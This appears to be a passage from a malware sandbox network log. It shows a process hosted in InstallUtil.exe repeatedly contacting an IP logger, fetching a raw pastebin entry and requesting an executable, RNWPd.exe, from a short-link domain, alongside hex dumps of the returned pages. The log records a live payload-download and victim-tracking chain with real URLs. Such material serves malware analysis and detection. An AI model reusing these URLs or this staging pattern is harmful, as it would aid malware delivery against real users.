                                                Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
                                                2024-08-09 21:01:24 UTC1369INData Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22
                                                Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
                                                2024-08-09 21:01:24 UTC156INData Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:01:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                13 | 192.168.2.6 | 49735 | 172.67.188.178 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:01:29 UTC | 68 | OUT | GET /1djqU4 HTTP/1.1
                                                Host: iplogger.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:29 UTC | 1285 | IN | HTTP/1.1 403 Forbidden
                                                Date: Fri, 09 Aug 2024 21:01:29 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                Cross-Origin-Embedder-Policy: require-corp
                                                Cross-Origin-Opener-Policy: same-origin
                                                Cross-Origin-Resource-Policy: same-origin
                                                Origin-Agent-Cluster: ?1
                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                Referrer-Policy: same-origin
                                                X-Content-Options: nosniff
                                                X-Frame-Options: SAMEORIGIN
                                                cf-mitigated: challenge


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                14 | 192.168.2.6 | 49737 | 172.67.19.24 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:01:30 UTC | 74 | OUT | GET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:30 UTC | 222 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:30 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aae885dc043c3-EWR


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                15 | 192.168.2.6 | 49738 | 188.114.96.3 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:01:30 UTC | 65 | OUT | GET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:31 UTC | 898 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:31 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:01:30 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:01:31 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WivIGbJ0UVDsHqMLHMbBjJRq3MTTAw5I4UywSrzrDY8uvtFdOZGE4OKWktr8XZv2IEpZ4Od%2F6IleGn20SDjzWg%2FNmPSdCK0RVMDtDwrvK6JtSVUpeN0dx64%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aae8c5905c359-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
                                                2024-08-09 21:01:31 UTC154INData Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:01:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                16 | 192.168.2.6 | 49739 | 172.67.19.24 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:01:36 UTC | 74 | OUT | GET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:36 UTC | 222 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:36 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aaeac9ae58c0f-EWR


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                17 | 192.168.2.6 | 49740 | 188.114.96.3 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:01:36 UTC | 65 | OUT | GET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:36 UTC | 904 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:36 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:01:36 GMT
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: HIT
                                                Age: 0
                                                Last-Modified: Fri, 09 Aug 2024 21:01:36 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o%2F1dcJgKObQsiDFjfnmK8RK9IKIP5iGDr7U%2BaJdEtCdA1Kg3F7%2BfJqF%2FZnD6ony9DJjOAR7ZUBkxyn4SIRkBIBPWIgMiAenBrGgJpgkAZRwqi1FFUxTddRE%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aaeb099fe0ca2-EWR
                                                alt-svc: h3=":443"; ma=86400


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                18 | 192.168.2.6 | 49741 | 172.67.19.24 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:01:41 UTC | 74 | OUT | GET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:41 UTC | 222 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:41 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aaed11b0f41e6-EWR


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                19 | 192.168.2.6 | 49742 | 188.114.96.3 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:01:42 UTC | 65 | OUT | GET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:42 UTC | 906 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:42 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:01:42 GMT
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: HIT
                                                Age: 0
                                                Last-Modified: Fri, 09 Aug 2024 21:01:42 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=im6GC9lxMSQzkNSvihhkeio1H7OVy%2B99B5yVRAQAt8BCh3H%2BhtdY5%2Fudkmf8PZUN5iGOMhQJ%2BraYpSV6i0ijcm63AiU2ak7K%2BuC3cy1lHtHvx3QfEuOf3ew%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aaed5198a4361-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                Data Ascii: t:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><di
                                                2024-08-09 21:01:42 UTC162INData Raw: 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: ,a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:01:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                20 | 192.168.2.6 | 49743 | 172.67.19.24 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:01:47 UTC | 74 | OUT | GET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:47 UTC | 222 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:47 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aaef57e360c80-EWR


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                21 | 192.168.2.6 | 49744 | 188.114.96.3 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:01:48 UTC | 65 | OUT | GET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:48 UTC | 896 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:48 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:01:48 GMT
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: HIT
                                                Age: 0
                                                Last-Modified: Fri, 09 Aug 2024 21:01:48 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VtYSUSXiMzqsopLTN4SXDXnKj0vwEcaO5aFBKV9bW8pGOclyUEWymU3g6QtRMwzH8vyGCmm3OYEP1cqiSAbOwBzIhq4ZDm4tAxqqSjXGfdMyMehGW19uwhE%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aaefbd8e34237-EWR
                                                alt-svc: h3=":443"; ma=86400


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                22 | 192.168.2.6 | 49745 | 172.67.19.24 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:01:54 UTC | 74 | OUT | GET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:54 UTC | 222 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:54 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aaf1ddc560f3e-EWR


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                23 | 192.168.2.6 | 49746 | 188.114.96.3 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:01:54 UTC | 65 | OUT | GET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:55 UTC | 898 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:54 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:01:54 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:01:54 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZXwsgjwWdYZFdg9S50cHQm9zPIGv%2FfiK7jTFwYWUtyxE%2BpTyzfmqafTrwctY9QtXNDb9bHZPFf1lOi9p9IeJXaBfO1AmesBZrCBXodVphqCuOy2K0g2JfdY%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aaf21dee441a6-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
                                                2024-08-09 21:01:55 UTC154INData Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:01:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                24 | 192.168.2.6 | 49747 | 172.67.19.24 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:01:59 UTC | 74 | OUT | GET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:59 UTC | 222 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:59 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aaf41bb4c43df-EWR


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                25 | 192.168.2.6 | 49748 | 188.114.96.3 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:02:00 UTC | 65 | OUT | GET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:02:00 UTC | 906 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:02:00 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:02:00 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:02:00 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qRfKNAQ99h4%2BCUK0DERFE21P6JYwwFurp%2BK0S%2F%2FbP5BJ%2BUZ9P3JzwcFUY8aM3VsYe%2F4L8fdrD6IsQ3BYY2oCkgZ7QLIutyT3sTpv3hDBcL7vWbXoVivGSw0%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aaf466f7817bd-EWR
                                                alt-svc: h3=":443"; ma=86400


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                26 | 192.168.2.6 | 49749 | 172.67.19.24 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:02:05 UTC | 74 | OUT | GET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:02:05 UTC | 222 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:02:05 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aaf65bc956a5f-EWR


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                27 | 192.168.2.6 | 49750 | 188.114.96.3 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:02:06 UTC | 65 | OUT | GET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:02:06 UTC | 900 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:02:06 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:02:06 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:02:06 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pXHicwiN%2F8oidIFpGuFxOfAafUSRp2nqvFj4OjfU9wUbAh%2B27LXxxk9MeR0g08nX3D97lL47L29fMgtqEikDKHKcpUC90A%2BCuRc6eHPgVjzG8ZkUzGPJrFk%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aaf69de014313-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-09 21:02:06 UTC469INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                                                Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                2024-08-09 21:02:06 UTC1369INData Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74
                                                Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
